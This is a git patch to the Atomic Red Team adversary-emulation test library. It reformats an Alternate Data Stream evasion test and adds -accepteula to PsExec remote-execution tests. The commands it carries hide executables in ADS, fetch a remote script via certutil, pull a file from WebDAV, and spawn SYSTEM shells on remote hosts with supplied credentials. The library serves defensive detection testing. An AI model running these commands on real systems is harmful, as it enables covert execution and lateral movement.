From 979befcf8a9c83cf80aac2900db7c026a41df989 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 20 Jul 2020 17:44:44 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/index.yaml     | 28 +++++++++++++---------------
 atomics/T1021.002/T1021.002.md |  2 +-
 atomics/T1021.006/T1021.006.md |  2 +-
 atomics/T1569.002/T1569.002.md |  2 +-
 4 files changed, 16 insertions(+), 18 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 614cd113..2baed0ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -27100,17 +27100,15 @@ defense-evasion:
           type: path
           default: c:\ADS\
       executor:
-        command: |
-          type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-          extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
-          findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
-          certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
-          makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
-          print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
-          reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
-          regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
-          expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
-          esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
+        command: "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32
+          #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump
+          #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache
+          -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1
+          c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint
+          /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg
+          #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg
+          HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe
+          /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n"
         name: command_prompt
         elevation_required: true
     - name: Store file in Alternate Data Stream (ADS)
@@ -40673,7 +40671,7 @@ execution:
           New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
           Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
       executor:
-        command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
+        command: '#{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
 
 '
         name: powershell
@@ -42393,7 +42391,7 @@ lateral-movement:
           type: String
           default: "\\\\localhost"
       executor:
-        command: 'psexec.exe #{remote_host} -c #{command_path}
+        command: 'psexec.exe #{remote_host} -accepteula -c #{command_path}
 
 '
         name: command_prompt
@@ -43011,8 +43009,8 @@ lateral-movement:
           New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
           Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
       executor:
-        command: "#{psexec_exe} \\\\#{computer_name} -u #{user_name} -p #{password}
-          -s cmd.exe\n"
+        command: "#{psexec_exe} \\\\#{computer_name} -accepteula -u #{user_name} -p
+          #{password} -s cmd.exe\n"
         name: command_prompt
     - name: Invoke-Command
       auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md
index 1a2160f8..b5574c34 100644
--- a/atomics/T1021.002/T1021.002.md
+++ b/atomics/T1021.002/T1021.002.md
@@ -101,7 +101,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 
 
 ```cmd
-psexec.exe #{remote_host} -c #{command_path}
+psexec.exe #{remote_host} -accepteula -c #{command_path}
 ```
 
 
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 9228f365..2944958f 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -138,7 +138,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a rem
 
 
 ```cmd
-#{psexec_exe} \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
+#{psexec_exe} \\#{computer_name} -accepteula -u #{user_name} -p #{password} -s cmd.exe
 ```
 
 
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index 9b9feffc..1a12568e 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -75,7 +75,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
 
 
 ```powershell
-#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
+#{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe"
 ```